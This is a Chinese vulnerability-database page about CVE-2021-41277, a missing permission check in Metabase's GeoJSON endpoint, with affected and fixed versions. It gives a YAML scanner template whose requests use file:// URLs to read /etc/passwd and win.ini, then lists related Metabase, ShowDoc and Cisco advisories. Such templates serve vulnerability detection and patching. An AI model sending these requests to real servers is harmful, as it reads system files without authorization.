CVE-2021-41277: Metabase 输入验证错误漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2021-41277

info:
  name: Metabase 输入验证错误漏洞
  author: rain
  severity: high
  verified: true
  description: |
    在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息。
    影响版本:
      metabase version < 0.40.5
      metabase version >= 1.0.0, < 1.40.5
    修复版本:
      metabase version >= 0.40.5
      metabase version >= 1.40.5
  tags: cve,cve2021,metabase
  created: 2023/07/15

rules:
  r0:
    request:
      method: GET
      path: /api/geojson?url=file:///etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r1:
    request:
      method: GET
      path: /api/geojson?url=file:///c://windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support")
expression: r0() || r1()

相关漏洞推荐

• CVE-2023-38646: Metabase 远程命令执行漏洞 RCE POC

  2025-09-01 | Metabase
  Metabase 是开源的数据分析和可视化工具，支持多种数据源连接，包括数据库、云服务和API。未经身份认证的远程攻击者利用该漏洞可以在服务器上以运行 Metabase 服务器的权限执行任意命令。值得...

• CVE-2021-41277: Metabase - Local File Inclusion POC

  2025-08-01 | Metabase
  Metabase is an open source data analytics platform. In affected versions a local file inclusion secu...

• CVE-2023-38646: Metabase < 0.46.6.1 - Remote Code Execution POC

  2025-08-01 | Metabase
  Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to exec...

• ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

  2025-09-12 | ShowDoc
  ShowDoc 2.9.5版本存在一个高危的文件上传漏洞(CVE-2021-36440)，该漏洞源于系统未能对上传文件的类型进行充分验证。攻击者可以绕过安全限制上传任意类型的危险文件，包括但不限于PH...

• CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

  2025-09-01 | Cisco HyperFlex HX Data Platform
  Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that coul...